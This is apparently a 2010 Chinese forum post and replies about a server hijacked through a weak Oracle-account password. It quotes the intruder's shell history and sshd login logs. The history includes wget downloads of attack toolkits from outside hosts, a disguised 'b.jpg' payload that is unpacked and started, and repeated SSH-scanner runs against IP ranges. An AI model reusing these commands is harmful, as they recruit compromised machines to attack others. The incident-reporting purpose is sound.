oracle 用户密码设置简单,第一次机器被人当肉鸡了
本帖最后由 fsm11 于 2010-08-18 10:46 编辑
657 cat /proc/cpuinfo
658 w
659 ls
660 cd /dev/shm/
661 ls -a
662 cd /tmp/
663 ls
664 ls -a
665 id
666 cd /var/tmp/
667 ls
668 ls -a
669 cd .oracle/
670 ls
671 cd
672 cd /tmp/
673 ls
674 ls -a
675 rm -rf gosh.tgz
676 ls
677 tar xvf m
678 tar xvf multiscan.tgz
679 cd .vox/
680 ./a 124.124
681 cd ..
682 ls
683 uname -a
684 wget http://y2khom3.evonet.ro/unixcod.tar.gz
685 cd .vox/
686 screen -r
687 screen
688 screen
689 screen -r
690 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
691 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
692 uname -a
693 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
694 cd ..
695 ls
696 wget http://freewebtown.com/dorin/e.tgz
697 cd .vox/
698 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
699 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
700 cd /tmp/
701 cd .vox/
702 cat vuln.txt
703 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
704 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
705 cd /dev/shm/
706 cd .v
707 cd /tmp/
708 cd .vox/
709 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
710 ./a 213.5
711 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
712 w
713 cd /tmp/
714 cd .vox/
715 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
716 cat vuln.txt
717 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
718 ./a 124.124
719 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
720 cat vuln.txt
721 ./a 83.69
722 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
723 cat vuln.txt
724 w
725 cd /tmp/
726 cd .vox/
727 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
728 cat vuln.txt
729 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
730 cd tm
731 ccd /tmp/
732 cd .viminfo
733 cd .viminfo
734 cd .vox
735 w
736 cd /dev/shm/
737 cd .v
738 ls -a
739 screen -r
740 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
741 cd /tmp/
742 cd .vox/
743 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
744 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
745 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
746 ./a 210.17
747 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
748 w
749 cd /tmp/
750 cd .vox/
751 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
752 cat vuln.txt
753 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
754 cd /tmp/
755 cd .vox/
756 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
757 cat vuln.txt
758 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
759 w
760 cd /tmp/
761 cd .vox/
762 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
763 cat vuln.txt
764 cd /dev/shm/
765 cd .v
766 cd /tmp/
767 w
768 cd .vox/
769 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
770 cat vuln.txt
771 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
772 w
773 cd /tmp/
774 cd .vox/
775 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
776 cat vuln.txt
777 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
778 w
779 cd /tmp/
780 cd .vox/
781 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
782 nano
783 cd ..
784 wget
785 tar xzvf b.jpg
786 cd .ICE-
787 cd .ICE-UNIX/
788 nano install
789 ./start maka
790 cd ..
791 ls
792 rm -rf b.jpg multiscan.tgz
793 w
794 cd /tmp/
795 cd .vox/
796 rm -rf b.jpg multiscan.tgz
797 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
798 cat vuln.txt
799 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
800 ./a 211.154
801 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
802 ./a 188.217
803 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
804 ./a 61.96
805 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
806 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
807 ./a 89.114
808 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
809 ./a 124.124
810 w
811 ls
812 cd /tmp/
813 cd .vox/
814 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
815 cat vuln.txt
816 w
817 cd /tmp/
818 cd .vox/
819 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
820 cat vuln.txt
821 cd /tmp/
822 cd .vox/
823 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
824 cat vuln.txt
825 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
826 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
827 cd /tmp/
828 cd .vox/
829 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
830 cat vuln.txt
831 ./a 203.235
832 ./a 203.236
833 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
834 ./a 203.237
835 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
836 cat vuln.txt
837 ./a 203.238
838 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
839 ./a 203.239
840 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
841 ./a 203.234
842 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
843 ./a 203.233
844 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
845 ./a 203.232
846 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
847 cat vuln.txt
848 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
849 ./a 203.231
850 cat vuln.txt
851 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
852 ./a 203.230
853 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
854 cat vuln.txt
855 rm -rf vuln.txt
856 touch vuln.txt
857 screen -r 6598.pts-0.lx;screen -r 6541.pts-0.lx;
858 cat vuln.txt
服务器 有大量的ssh-scan 进程
Aug 15 07:10:18 sshd[6404]: Accepted password for oracle from ::ffff:91.142.211.42 port 36258 ssh2
Aug 15 07:11:43 sshd[6472]: Accepted password for oracle from ::ffff:91.142.211.42 port 36361 ssh2
Aug 15 16:23:39 sshd[29523]: Accepted password for oracle from ::ffff:91.142.211.42 port 53247 ssh2
Aug 15 16:49:33 sshd[31424]: Accepted password for oracle from ::ffff:91.142.211.42 port 54272 ssh2
Aug 15 18:43:50 sshd[2745]: Accepted password for oracle from ::ffff:91.142.211.42 port 58091 ssh2
Aug 15 21:23:23 sshd[14983]: Accepted password for oracle from ::ffff:91.142.211.42 port 34298 ssh2
Aug 15 22:04:38 sshd[16305]: Accepted password for oracle from ::ffff:91.142.211.42 port 33369 ssh2
Aug 15 23:26:09 sshd[19404]: Accepted password for oracle from ::ffff:91.142.211.42 port 57308 ssh2
同一个IP
这次入侵看来还是比较友好的入侵,只是把我的服务器当肉鸡来扫描其他的IP段的机器。没有做什么破坏性的操作
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(6)
恩
回复 3# fsm11
最严重的问题出现了,内核版本可溢出。
修改密码,修改只允许IP远程.
先修改下ssh默认端口吧
呵呵,普通用户的下的提权工具可以做到,我这个只是在oracle 用户下跑的ssh-scan,没有在root 用户下跑。
比较好奇,如果得知了 oracle 的密码,如何通过 oracle 获取 root 权限?